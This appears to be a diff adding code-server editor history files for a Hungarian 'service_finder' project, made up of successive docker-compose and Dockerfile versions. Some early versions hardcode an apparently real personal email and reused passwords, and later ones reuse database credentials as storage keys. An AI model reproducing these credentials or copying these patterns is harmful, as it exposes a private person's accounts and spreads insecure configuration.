Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + volumes: + - ./backend:/app + # Parancs kiegészítése: meg kell engedni a proxy-tól jövő kéréseket + command: uvicorn app.main:app --host 0.0.0.0 --port 8000 --proxy-headers --forwarded-allow-ips="*" + ports: + - "8000:8000" + environment: + - PYTHONPATH=/app + - DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@postgres-db:${APP_DB_PORT}/${APP_DB_NAME} + - SECRET_KEY=${SECRET_KEY} + # CORS beállítás: fontos, hogy a domainjeidről engedélyezd a kérést! + - ALLOWED_ORIGINS=https://dev.profibot.hu,https://app.profibot.hu + + # ÚJ: MinIO és Redis beállítások a jövőbeli NAS-hoz (felkészülés) + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} # Egyszerűség kedvéért most ugyanaz + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + depends_on: + - postgres-db + - minio + - redis + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (NAS - Dokumentum tároló) - ÚJ! + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + - minio_data:/data + ports: + - "9000:9000" # API + - "9001:9001" # UI + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár & Session) - ÚJ! + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + - redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: + minio_data: # Itt lesznek a fájlok (számlák, fotók) + redis_data: diff --git a/code-server-config/data/User/History/37941b6f/7GyZ.yml b/code-server-config/data/User/History/37941b6f/7GyZ.yml new file mode 100755 index 0000000..8f0f9ac --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/7GyZ.yml @@ -0,0 +1,92 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 # Később ide jön a postgis/postgis:15-3.3-alpine a térképekhez + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + # 2. BACKEND API (Az Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + # Parancs kiegészítése: meg kell engedni a proxy-tól jövő kéréseket + command: uvicorn app.main:app --host 0.0.0.0 --port 8000 --proxy-headers --forwarded-allow-ips="*" + ports: + - "8000:8000" + environment: + - PYTHONPATH=/app + - DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@postgres-db:${APP_DB_PORT}/${APP_DB_NAME} + - SECRET_KEY=${SECRET_KEY} + # CORS beállítás: fontos, hogy a domainjeidről engedélyezd a kérést! + - ALLOWED_ORIGINS=https://dev.profibot.hu,https://app.profibot.hu + + # ÚJ: MinIO és Redis beállítások a jövőbeli NAS-hoz (felkészülés) + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} # Egyszerűség kedvéért most ugyanaz + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + depends_on: + - postgres-db + - minio + - redis + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (NAS - Dokumentum tároló) - ÚJ! + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + - minio_data:/data + ports: + - "9000:9000" # API + - "9001:9001" # UI + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár & Session) - ÚJ! + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + - redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: + minio_data: # Itt lesznek a fájlok (számlák, fotók) + redis_data: diff --git a/code-server-config/data/User/History/37941b6f/8e20.yml b/code-server-config/data/User/History/37941b6f/8e20.yml new file mode 100755 index 0000000..1c1a1c7 --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/8e20.yml @@ -0,0 +1,91 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 # Később ide jön a postgis/postgis:15-3.3-alpine a térképekhez + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + # 2. BACKEND API (Az Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + ports: + - "8000:8000" + volumes: + - ./backend:/app/ # Hot-reload fejlesztéshez + - ./frontend:/app/frontend # Statikus fájlok + environment: + - DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} + + - SECRET_KEY=${SECRET_KEY} + + # ÚJ: MinIO és Redis beállítások a jövőbeli NAS-hoz (felkészülés) + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} # Egyszerűség kedvéért most ugyanaz + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + depends_on: + - postgres-db + - minio + - redis + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (NAS - Dokumentum tároló) - ÚJ! + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + - minio_data:/data + ports: + - "9000:9000" # API + - "9001:9001" # UI + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár & Session) - ÚJ! + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + - redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: + minio_data: # Itt lesznek a fájlok (számlák, fotók) + redis_data: diff --git a/code-server-config/data/User/History/37941b6f/KJm1.yml b/code-server-config/data/User/History/37941b6f/KJm1.yml new file mode 100755 index 0000000..4d86ba8 --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/KJm1.yml @@ -0,0 +1,54 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 + container_name: postgres-db + environment: + POSTGRES_USER: admin + POSTGRES_PASSWORD: PASSWORD_111 + POSTGRES_DB: service_finder + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "5432:5432" + networks: + - service_finder_net + + # 2. BACKEND API (Az Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + ports: + - "8000:8000" + volumes: + - ./backend:/app/app + - ./frontend:/app/frontend + environment: + - DATABASE_URL=postgresql+asyncpg://admin:PASSWORD_111@postgres-db:5432/service_finder + depends_on: + - postgres-db + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor - Ezt hiányoltad!) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: kincses@gmail.com + PGADMIN_DEFAULT_PASSWORD: MiskociA74 + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: diff --git a/code-server-config/data/User/History/37941b6f/b1RX.yml b/code-server-config/data/User/History/37941b6f/b1RX.yml new file mode 100755 index 0000000..2a16370 --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/b1RX.yml @@ -0,0 +1,88 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 # Később ide jön a postgis/postgis:15-3.3-alpine a térképekhez + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + # 2. BACKEND API (Az Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + ports: + - "8000:8000" + volumes: + - ./backend:/app/ # Hot-reload fejlesztéshez + - ./frontend:/app/frontend # Statikus fájlok + environment: + - DATABASE_URL=${DATABASE_URL} + # ÚJ: MinIO és Redis beállítások a jövőbeli NAS-hoz (felkészülés) + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} # Egyszerűség kedvéért most ugyanaz + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + depends_on: + - postgres-db + - minio + - redis + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (NAS - Dokumentum tároló) - ÚJ! + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + - minio_data:/data + ports: + - "9000:9000" # API + - "9001:9001" # UI + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár & Session) - ÚJ! + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + - redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: + minio_data: # Itt lesznek a fájlok (számlák, fotók) + redis_data: diff --git a/code-server-config/data/User/History/37941b6f/entries.json b/code-server-config/data/User/History/37941b6f/entries.json new file mode 100755 index 0000000..35c195f --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/docker-compose_NAS_el%C5%91tt.yml","entries":[{"id":"KJm1.yml","timestamp":1768941142773},{"id":"te4Z.yml","timestamp":1768941153007},{"id":"qTnB.yml","timestamp":1768941175024},{"id":"gx07.yml","timestamp":1769023755619},{"id":"b1RX.yml","timestamp":1769026642757},{"id":"ysWr.yml","timestamp":1769031074221},{"id":"8e20.yml","timestamp":1769031651647},{"id":"h3mF.yml","timestamp":1769106194741},{"id":"7GyZ.yml","timestamp":1769107662642},{"id":"5wWC.yml","timestamp":1769108106769},{"id":"qmLz.yml","source":"renamed.source","sourceDescription":"/home/coder/project/docker-compose.yml","timestamp":1769114711041}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/37941b6f/gx07.yml b/code-server-config/data/User/History/37941b6f/gx07.yml new file mode 100755 index 0000000..b24da01 --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/gx07.yml @@ -0,0 +1,88 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 # Később ide jön a postgis/postgis:15-3.3-alpine a térképekhez + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + # 2. BACKEND API (Az Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + ports: + - "8000:8000" + volumes: + - ./backend:/app/app # Hot-reload fejlesztéshez + - ./frontend:/app/frontend # Statikus fájlok + environment: + - DATABASE_URL=${DATABASE_URL} + # ÚJ: MinIO és Redis beállítások a jövőbeli NAS-hoz (felkészülés) + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} # Egyszerűség kedvéért most ugyanaz + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + depends_on: + - postgres-db + - minio + - redis + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (NAS - Dokumentum tároló) - ÚJ! + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + - minio_data:/data + ports: + - "9000:9000" # API + - "9001:9001" # UI + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár & Session) - ÚJ! + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + - redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: + minio_data: # Itt lesznek a fájlok (számlák, fotók) + redis_data: diff --git a/code-server-config/data/User/History/37941b6f/h3mF.yml b/code-server-config/data/User/History/37941b6f/h3mF.yml new file mode 100755 index 0000000..cae7d92 --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/h3mF.yml @@ -0,0 +1,91 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 # Később ide jön a postgis/postgis:15-3.3-alpine a térképekhez + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + # 2. BACKEND API (Az Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + # Parancs kiegészítése: meg kell engedni a proxy-tól jövő kéréseket + command: uvicorn app.main:app --host 0.0.0.0 --port 8000 --proxy-headers --forwarded-allow-ips="*" + ports: + - "8000:8000" + environment: + - DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@postgres-db:${APP_DB_PORT}/${APP_DB_NAME} + - SECRET_KEY=${SECRET_KEY} + # CORS beállítás: fontos, hogy a domainjeidről engedélyezd a kérést! + - ALLOWED_ORIGINS=https://dev.profibot.hu,https://app.profibot.hu + + # ÚJ: MinIO és Redis beállítások a jövőbeli NAS-hoz (felkészülés) + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} # Egyszerűség kedvéért most ugyanaz + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + depends_on: + - postgres-db + - minio + - redis + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (NAS - Dokumentum tároló) - ÚJ! + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + - minio_data:/data + ports: + - "9000:9000" # API + - "9001:9001" # UI + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár & Session) - ÚJ! + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + - redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: + minio_data: # Itt lesznek a fájlok (számlák, fotók) + redis_data: diff --git a/code-server-config/data/User/History/37941b6f/qTnB.yml b/code-server-config/data/User/History/37941b6f/qTnB.yml new file mode 100755 index 0000000..48bd36d --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/qTnB.yml @@ -0,0 +1,54 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 + container_name: postgres-db + environment: + POSTGRES_USER: kincses + POSTGRES_PASSWORD: MiskociA74 + POSTGRES_DB: service_finder + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "5432:5432" + networks: + - service_finder_net + + # 2. BACKEND API (Az Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + ports: + - "8000:8000" + volumes: + - ./backend:/app/app + - ./frontend:/app/frontend + environment: + - DATABASE_URL=postgresql+asyncpg://admin:MiskociA74@postgres-db:5432/service_finder + depends_on: + - postgres-db + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor - Ezt hiányoltad!) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: kincses@gmail.com + PGADMIN_DEFAULT_PASSWORD: MiskociA74 + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: diff --git a/code-server-config/data/User/History/37941b6f/qmLz.yml b/code-server-config/data/User/History/37941b6f/qmLz.yml new file mode 100755 index 0000000..b02c63e --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/qmLz.yml @@ -0,0 +1,94 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 # Később ide jön a postgis/postgis:15-3.3-alpine a térképekhez + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + # 2. BACKEND API (Az Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + volumes: + - ./backend:/app + # Parancs kiegészítése: meg kell engedni a proxy-tól jövő kéréseket + command: uvicorn app.main:app --host 0.0.0.0 --port 8000 --proxy-headers --forwarded-allow-ips="*" + ports: + - "8000:8000" + environment: + - PYTHONPATH=/app + - DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@postgres-db:${APP_DB_PORT}/${APP_DB_NAME} + - SECRET_KEY=${SECRET_KEY} + # CORS beállítás: fontos, hogy a domainjeidről engedélyezd a kérést! + - ALLOWED_ORIGINS=https://dev.profibot.hu,https://app.profibot.hu + + # ÚJ: MinIO és Redis beállítások a jövőbeli NAS-hoz (felkészülés) + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} # Egyszerűség kedvéért most ugyanaz + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + depends_on: + - postgres-db + - minio + - redis + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (NAS - Dokumentum tároló) - ÚJ! + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + - minio_data:/data + ports: + - "9000:9000" # API + - "9001:9001" # UI + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár & Session) - ÚJ! + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + - redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: + minio_data: # Itt lesznek a fájlok (számlák, fotók) + redis_data: diff --git a/code-server-config/data/User/History/37941b6f/te4Z.yml b/code-server-config/data/User/History/37941b6f/te4Z.yml new file mode 100755 index 0000000..a6512cf --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/te4Z.yml @@ -0,0 +1,54 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 + container_name: postgres-db + environment: + POSTGRES_USER: admin + POSTGRES_PASSWORD: PASSWORD_111 + POSTGRES_DB: service_finder + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "5432:5432" + networks: + - service_finder_net + + # 2. BACKEND API (Az Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + ports: + - "8000:8000" + volumes: + - ./backend:/app/app + - ./frontend:/app/frontend + environment: + - DATABASE_URL=postgresql+asyncpg://admin:MiskociA74@postgres-db:5432/service_finder + depends_on: + - postgres-db + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor - Ezt hiányoltad!) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: kincses@gmail.com + PGADMIN_DEFAULT_PASSWORD: MiskociA74 + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: diff --git a/code-server-config/data/User/History/37941b6f/ysWr.yml b/code-server-config/data/User/History/37941b6f/ysWr.yml new file mode 100755 index 0000000..14ac979 --- /dev/null +++ b/code-server-config/data/User/History/37941b6f/ysWr.yml @@ -0,0 +1,88 @@ +services: + # 1. ADATBÁZIS (A Raktár) + postgres-db: + image: postgres:15 # Később ide jön a postgis/postgis:15-3.3-alpine a térképekhez + container_name: postgres-db + environment: + POSTGRES_USER: ${POSTGRES_USER} + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} + POSTGRES_DB: ${POSTGRES_DB} + volumes: + - postgres_data:/var/lib/postgresql/data + ports: + - "${POSTGRES_PORT}:${POSTGRES_PORT}" + networks: + - service_finder_net + restart: unless-stopped + + # 2. BACKEND API (Az Agy) + service_finder_api: + build: + context: ./backend + dockerfile: Dockerfile + container_name: service_finder_api + ports: + - "8000:8000" + volumes: + - ./backend:/app/ # Hot-reload fejlesztéshez + - ./frontend:/app/frontend # Statikus fájlok + environment: + - DATABASE_URL=postgresql+asyncpg://${APP_DB_USER}:${APP_DB_PASSWORD}@${APP_DB_HOST}:${APP_DB_PORT}/${APP_DB_NAME} + # ÚJ: MinIO és Redis beállítások a jövőbeli NAS-hoz (felkészülés) + - MINIO_ENDPOINT=minio:9000 + - MINIO_ACCESS_KEY=${POSTGRES_USER} # Egyszerűség kedvéért most ugyanaz + - MINIO_SECRET_KEY=${POSTGRES_PASSWORD} + depends_on: + - postgres-db + - minio + - redis + networks: + - service_finder_net + + # 3. PGADMIN (A Monitor) + pgadmin: + image: dpage/pgadmin4 + container_name: pgadmin_ui + environment: + PGADMIN_DEFAULT_EMAIL: ${PGADMIN_EMAIL} + PGADMIN_DEFAULT_PASSWORD: ${PGADMIN_PASSWORD} + ports: + - "5050:80" + depends_on: + - postgres-db + networks: + - service_finder_net + + # 4. MINIO (NAS - Dokumentum tároló) - ÚJ! + minio: + image: minio/minio + container_name: service_finder_minio + command: server /data --console-address ":9001" + environment: + MINIO_ROOT_USER: ${POSTGRES_USER} + MINIO_ROOT_PASSWORD: ${POSTGRES_PASSWORD} + volumes: + - minio_data:/data + ports: + - "9000:9000" # API + - "9001:9001" # UI + networks: + - service_finder_net + + # 5. REDIS (Gyorsítótár & Session) - ÚJ! + redis: + image: redis:alpine + container_name: service_finder_redis + volumes: + - redis_data:/data + networks: + - service_finder_net + +networks: + service_finder_net: + driver: bridge + +volumes: + postgres_data: + minio_data: # Itt lesznek a fájlok (számlák, fotók) + redis_data: diff --git a/code-server-config/data/User/History/3ae47db8/WFYx b/code-server-config/data/User/History/3ae47db8/WFYx new file mode 100755 index 0000000..9b94eee --- /dev/null +++ b/code-server-config/data/User/History/3ae47db8/WFYx @@ -0,0 +1,13 @@ +FROM python:3.12-slim + +WORKDIR /app + +# Rendszerfüggőségek telepítése +RUN apt-get update && apt-get install -y --no-install-recommends gcc python3-dev && rm -rf /var/lib/apt/lists/* + +# Python csomagok fixálása +RUN pip install --no-cache-dir fastapi uvicorn sqlalchemy asyncpg python-dotenv python-multipart "python-jose[cryptography]" "passlib[bcrypt]" + +# Munkakönyvtár beállítása +ENV PYTHONPATH=/app +CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8000", "--reload", "--reload-dir", "/app/app"] \ No newline at end of file diff --git a/code-server-config/data/User/History/3ae47db8/bsiX b/code-server-config/data/User/History/3ae47db8/bsiX new file mode 100755 index 0000000..d20c85c --- /dev/null +++ b/code-server-config/data/User/History/3ae47db8/bsiX @@ -0,0 +1,33 @@ +FROM python:3.12-slim + +WORKDIR /app + +# Rendszerfüggőségek +RUN apt-get update && apt-get install -y --no-install-recommends \ + gcc \ + python3-dev \ + libpq-dev \ + && rm -rf /var/lib/apt/lists/* + +# Összes szükséges Python csomag (Hozzáadva: sendgrid) +RUN pip install --no-cache-dir \ + fastapi \ + uvicorn \ + sqlalchemy \ + asyncpg \ + python-dotenv \ + python-multipart \ + "python-jose[cryptography]" \ + bcrypt \ + passlib \ + pydantic-settings \ + minio \ + redis \ + email-validator \ + sendgrid + +# Fájlok másolása és elérési út beállítása +COPY . . +ENV PYTHONPATH=/app + +CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8000"] \ No newline at end of file diff --git a/code-server-config/data/User/History/3ae47db8/eAJ3 b/code-server-config/data/User/History/3ae47db8/eAJ3 new file mode 100755 index 0000000..537ffc9 --- /dev/null +++ b/code-server-config/data/User/History/3ae47db8/eAJ3 @@ -0,0 +1,33 @@ +FROM python:3.12-slim + +WORKDIR /app + +# Rendszerfüggőségek telepítése (libpq-dev fontos a Postgreshez!) +RUN apt-get update && apt-get install -y --no-install-recommends \ + gcc \ + python3-dev \ + libpq-dev \ + && rm -rf /var/lib/apt/lists/* + +# Python csomagok telepítése +# HOZZÁADVA: pydantic-settings (a config-hoz), minio (a NAS-hoz), redis (a cache-hez) +RUN pip install --no-cache-dir \ + fastapi \ + uvicorn \ + sqlalchemy \ + asyncpg \ + python-dotenv \ + python-multipart \ + "python-jose[cryptography]" \ + "passlib[bcrypt]" \ + pydantic-settings \ + minio \ + redis + +# Munkakönyvtár beállítása a Python Path-hoz +ENV PYTHONPATH=/app + +# Indítás +# Fontos: Mivel a backend mappát csatoljuk a /app-ra, az "app.main:app" +# a /app/app/main.py fájlt fogja keresni. Ez így helyes! +CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8000", "--reload"] \ No newline at end of file diff --git a/code-server-config/data/User/History/3ae47db8/entries.json b/code-server-config/data/User/History/3ae47db8/entries.json new file mode 100755 index 0000000..54e7bff --- /dev/null +++ b/code-server-config/data/User/History/3ae47db8/entries.json @@ -0,0 +1 @@ +{"version":1,"resource":"vscode-remote://192.168.100.43:8443/home/coder/project/backend/Dockerfile","entries":[{"id":"WFYx","timestamp":1768952471404},{"id":"eAJ3","timestamp":1769026950466},{"id":"fjXV","timestamp":1769108266719},{"id":"bsiX","timestamp":1769108569963}]} \ No newline at end of file diff --git a/code-server-config/data/User/History/3ae47db8/fjXV b/code-server-config/data/User/History/3ae47db8/fjXV new file mode 100755 index 0000000..0ca5639 --- /dev/null +++ b/code-server-config/data/User/History/3ae47db8/fjXV @@ -0,0 +1,31 @@ +FROM python:3.12-slim + +WORKDIR /app + +# Rendszerfüggőségek +RUN apt-get update && apt-get install -y --no-install-recommends \ + gcc \ + python3-dev \ + libpq-dev \ + && rm -rf /var/lib/apt/lists/* + +# Python csomagok frissített listája +RUN pip install --no-cache-dir \ + fastapi \ + uvicorn \ + sqlalchemy \ + asyncpg \ + python-dotenv \ + python-multipart \ + "python-jose[cryptography]" \ + bcrypt \ + passlib \ + pydantic-settings \ + minio \ + redis \ + email-validator + +# Munkakönyvtár beállítása +ENV PYTHONPATH=/app + +CMD ["uvicorn", "app.main:app", "--host", "0.0.0.0", "--port", "8000", "--reload"] \ No newline at end of file diff --git a/code-server-config/data/User/History/5144c62f/entries.json b/code-server-config/data/User/History/5144c62f/entries.json new file mode 100755 index 0000000..529ba7b --- /dev/null +++ b/code-server-config/data/User/History/5144c62f/entries.json @@ -0,0 +1 @@ 